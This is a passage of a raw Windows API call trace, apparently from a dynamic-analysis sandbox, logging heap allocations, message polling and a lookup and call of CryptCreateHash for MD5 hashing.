lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.945] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.945] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.945] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0267.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0267.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.946] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0267.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.948] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.948] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.948] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.948] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.949] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.949] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.949] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.949] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.949] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0267.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.950] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.950] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.950] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.951] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0267.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0267.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.951] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0267.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0267.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0267.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0267.955] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0267.955] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0267.955] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 